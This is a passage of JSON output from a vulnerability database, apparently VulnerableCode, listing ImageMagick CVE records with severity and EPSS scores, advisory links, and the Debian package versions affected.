"VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2022-1114" ], "risk_score": 2.8, "exploitability": "0.5", "weighted_severity": "5.5", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bky2-hjpj-67ag" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81976?format=api", "vulnerability_id": "VCID-c8rr-y6zy-h7h5", "summary": "ImageMagick: integer overflow at MagickCore/statistic.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27774.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27774.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27774", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24834", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24914", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24954", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24729", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24796", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24841", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24855", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24816", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24759", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.2477", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24762", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24739", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24678", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27774" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27774", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27774" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898296", "reference_id": "1898296", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898296" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27774" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-c8rr-y6zy-h7h5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81710?format=api", "vulnerability_id": "VCID-ccbh-689z-6kg2", "summary": "ImageMagick: heap-based buffer over-read in WritePNGImage in coders/png.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-19949.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-19949.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00342", "scoring_system": "epss", "scoring_elements": "0.56759", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00342", "scoring_system": "epss", "scoring_elements": "0.56853", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00342", "scoring_system": "epss", "scoring_elements": "0.56874", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00342", "scoring_system": "epss", "scoring_elements": "0.5685", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00342", "scoring_system": "epss", "scoring_elements": "0.56901", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00342", "scoring_system": "epss", "scoring_elements": "0.56905", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00342", "scoring_system": "epss", "scoring_elements": "0.56914", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00342", "scoring_system": "epss", "scoring_elements": "0.56893", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00342", "scoring_system": "epss", "scoring_elements": "0.56871", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00342", "scoring_system": "epss", "scoring_elements": "0.569", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00342", "scoring_system": "epss", "scoring_elements": "0.56897", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00342", "scoring_system": "epss", "scoring_elements": "0.56814", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1792480", "reference_id": "1792480", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1792480" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=947309", "reference_id": "947309", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=947309" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4549-1/", "reference_id": "USN-4549-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4549-1/" }, { "reference_url": "https://usn.ubuntu.com/4670-1/", "reference_id": "USN-4670-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4670-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": 